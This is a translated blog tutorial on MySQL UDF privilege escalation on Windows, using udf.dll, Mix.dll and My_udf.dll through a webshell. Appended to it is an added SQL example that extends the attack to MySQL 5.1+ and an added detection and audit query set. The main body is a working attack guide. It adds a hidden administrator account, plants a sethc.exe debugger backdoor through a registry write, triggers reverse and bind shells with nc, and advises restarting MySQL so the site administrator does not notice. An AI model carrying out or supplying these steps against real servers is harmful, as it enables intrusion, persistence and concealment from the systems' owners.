MySQL UDF / Mix.dll privilege escalation

Disclaimer: This article is original content of the Coisini community and may not be reproduced without permission. https://blog.csdn.net/kclax/article/details/91500823

The first part was seen on Hack58; the original author is unknown. The section that follows was collected from the Internet; if it infringes copyright, please leave a message.

1. Function: use MySQL user-defined functions (UDF) to turn a MySQL account into SYSTEM privileges on the host. (Again: MySQL UDF privilege escalation is not an overflow exploit; it uses a built-in feature of MySQL.)

2. Prerequisites: (1) the target system is Windows (Win2000, XP, Win2003); (2) you already hold a MySQL account, and that account must have INSERT and DELETE privileges on the mysql database, which is what CREATE FUNCTION and DROP FUNCTION require (per the MySQL documentation).

3. Usage:
Step 1: upload the PHP file to the target machine, fill in your account and connect to MySQL through it.
Step 2: after a successful connection, export the DLL file. Pay attention to the export path (normally it can be written to any directory, permissions permitting). For MySQL 5.0 and later you must export the DLL to the target machine's system directory (winnt or system32), otherwise the next step fails with "No paths allowed for shared library". Caveat: on MySQL 5.1 and later (and MariaDB) the library must instead be in the directory named by the plugin_dir system variable (check it with SHOW VARIABLES LIKE 'plugin_dir'); a DLL in the system directory is not found there and CREATE FUNCTION fails with "Can't open shared library".
Step 3: create the function with an SQL statement. Syntax: create function <function name> returns string soname '<exported DLL path>'; (the function name must be one of those listed below). For MySQL 5.0 and later the statement does not allow a full path in soname; if you exported the DLL to the system directory in step 2, omit the path and the command executes normally, otherwise you get a "Can't open shared library" error and must re-export the DLL to the system directory.
Step 4: once the function has been created successfully, call it with SQL. Syntax: select <function name>('<parameter list>'); each function takes different parameters; run select <function name>('help'); to get the parameter list of a given function.
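The four steps above, carried out entirely from the MySQL session on a MySQL 5.1+ server, as an added example that is not part of the original post or of the udf.dll tool. It covers the case the post does not: soname must name a file inside plugin_dir, so the DLL is copied there with MySQL's own file I/O instead of being dropped into the system directory. Assumptions (not from the page): the account holds the FILE privilege as well as INSERT on mysql, secure_file_priv is empty, mysqld can write to plugin_dir, and the DLL was already uploaded through the webshell to d:/php/php/udf.dll.

```sql
-- Added example, not from the original post. Assumes: FILE privilege,
-- secure_file_priv empty, mysqld able to write into plugin_dir, and udf.dll
-- already uploaded via the webshell to d:/php/php/udf.dll (assumed path).

-- Step 1/2 recon: version, where UDF libraries must live, and whether file I/O
-- is restricted. A non-empty secure_file_priv confines LOAD_FILE/DUMPFILE to
-- that directory; NULL disables them entirely and this approach stops here.
SELECT @@version, @@version_compile_os, @@plugin_dir, @@secure_file_priv;
SHOW GRANTS;

-- Step 2: copy the DLL from the web-writable directory into plugin_dir.
-- DUMPFILE needs a literal path, so the statement is built dynamically.
-- Forward slashes avoid MySQL's backslash escape processing in literals
-- ('\\' in a literal is a single backslash); QUOTE() produces a safe literal.
SET @src = 'd:/php/php/udf.dll';
SET @dst = CONCAT(TRIM(TRAILING '/' FROM REPLACE(@@plugin_dir, '\\', '/')), '/udf.dll');
SET @sql = CONCAT('SELECT LOAD_FILE(', QUOTE(@src), ') INTO DUMPFILE ', QUOTE(@dst));
PREPARE stmt FROM @sql;
EXECUTE stmt;          -- LOAD_FILE returns NULL if the source is unreadable;
DEALLOCATE PREPARE stmt; -- DUMPFILE refuses to overwrite an existing file.

-- Step 3: register the exported function; soname is a bare file name.
CREATE FUNCTION cmdshell RETURNS STRING SONAME 'udf.dll';

-- Step 4: run a command with the privileges of the mysqld process.
SELECT cmdshell('whoami');

-- Cleanup: deregister the function. The DLL remains in plugin_dir and has to
-- be deleted on the host separately.
DROP FUNCTION cmdshell;
```

If EXECUTE returns an error about the target path, plugin_dir is not writable by mysqld, which is the normal state of a hardened install and the point at which this technique stops working.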
4. Function descriptions:
cmdshell: executes a cmd command;
downloader: downloads the specified URL and saves the file to the specified directory;
open3389: opens 3389 (Terminal Services); a port can be specified (changing the port does not require a reboot);
backshell: reverse shell;
processview: enumerates system processes;
killprocess: terminates the specified process;
regread: reads the registry;
regwrite: writes the registry;
shut: shutdown, log off, restart;
about: description and help for the functions;

Registry write function (sets the Image File Execution Options Debugger for sethc.exe to the uploaded executable). Backslashes are doubled because MySQL treats a single backslash in a string literal as an escape character unless NO_BACKSLASH_ESCAPES is set:
select regwrite('HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe','Debugger','REG_SZ','E:\\web\\170stock\\admin\\include\\explorer.exe');

udf.dll location: C:\Winnt\udf.dll on Windows 2000, C:\Windows\udf.dll on Windows 2003; export udf.dll to whichever of the two applies on the target server. Then:
create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user admins 226404553 /add');
select cmdshell('net localgroup administrators admins /add');
select cmdshell('c:\\3389.exe');
select cmdshell('netstat -an');
drop function cmdshell; -- delete the function

III. Mix.dll privilege escalation
Once you have a webshell, finding the MySQL user and password is not hard. I will use another machine of mine for the demonstration; the PHP shell is already uploaded. The account and password used to connect to MySQL are usually easy to find: open any PHP file and there they are.
See: username root, password 123456, database php. What next? First connect with SQL Query. Connected. Now upload our escalation tools, Mix.dll and My_udf.dll. Mix.dll is used for a reverse connection; My_udf.dll is a bind (forward) connection: you connect directly to the target's port 3306 and enter the password to get a cmdshell. Once they are uploaded, execute the following SQL to register the function (backslashes doubled for MySQL's string literals): create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll';

The SQL statement executed successfully!

The cmdshell is not far off now. First listen on a port locally with nc: nc -l -p 1234 (no screenshot of that). Then execute: select Mixconnect('192.168.1.254','1234'); to trigger the function. If it executes successfully, check whether nc received the connection; we got the cmdshell. However, the target's MySQL then hangs: kill the MySQL process and restart the MySQL service, otherwise the site administrator will notice that the site no longer works, and then...

If the server does not allow outbound connections to any external IP and port, but its port 3306 is reachable from outside, My_udf.dll comes into play. Using the same method as with Mix, execute the following after connecting to MySQL: create function my_udfdoor returns string soname 'D:\\php\\php\\my_udf.dll'; After the statement succeeds, activate the function: select my_udfdoor(''); then connect with nc to port 3306, enter the password, and you get a cmdshell.
Privilege escalation summary (Mix.dll):

Upload mix.dll to D:/usr/www/html/mix.dll
mysql -h <target ip> -uroot -p < c:\mysql.txt
select Mixconnect('<bounce ip>','<port>');
nc -vv -l -p 1983
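The checks a DBA or responder would run to find the udf.dll, Mix.dll and My_udf.dll technique described on this page, as an added example that is not part of the original post. It assumes a MySQL 5.1+ or MariaDB server and an account that can read the mysql system database; the function name in the final statement is the one used earlier on the page and is only an illustration.

```sql
-- Added example, not from the original post: auditing a server for the UDF
-- technique above. Assumes MySQL 5.1+/MariaDB and read access to mysql.*.

-- Every function registered with CREATE FUNCTION ... SONAME is recorded in
-- mysql.func. Names like cmdshell, Mixconnect or my_udfdoor, or any dl value
-- that is not part of an installed product, are the indicator.
SELECT name, ret, dl, type FROM mysql.func;

-- Accounts that could stage the attack: FILE (global) lets them write a DLL
-- into plugin_dir; INSERT/DELETE on the mysql database, globally or
-- db-scoped, lets them register and drop functions.
SELECT user, host, File_priv, Insert_priv, Delete_priv
  FROM mysql.user
 WHERE File_priv = 'Y' OR Insert_priv = 'Y' OR Delete_priv = 'Y';

SELECT user, host, db, Insert_priv, Delete_priv
  FROM mysql.db
 WHERE db = 'mysql' AND (Insert_priv = 'Y' OR Delete_priv = 'Y');

-- The settings that decide whether a DLL can be planted at all: plugin_dir
-- should not be writable by mysqld, and secure_file_priv should be set.
SELECT @@plugin_dir, @@secure_file_priv;

-- Containment for a rogue entry found above: deregister it (effective at
-- once, no restart), then delete the DLL from plugin_dir on the host.
DROP FUNCTION IF EXISTS cmdshell;
```

Run the first query on a schedule or from a monitoring job; a new row in mysql.func on a server that never installs UDFs is a high-signal alert, and the dl column tells you which file to pull from plugin_dir for analysis.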

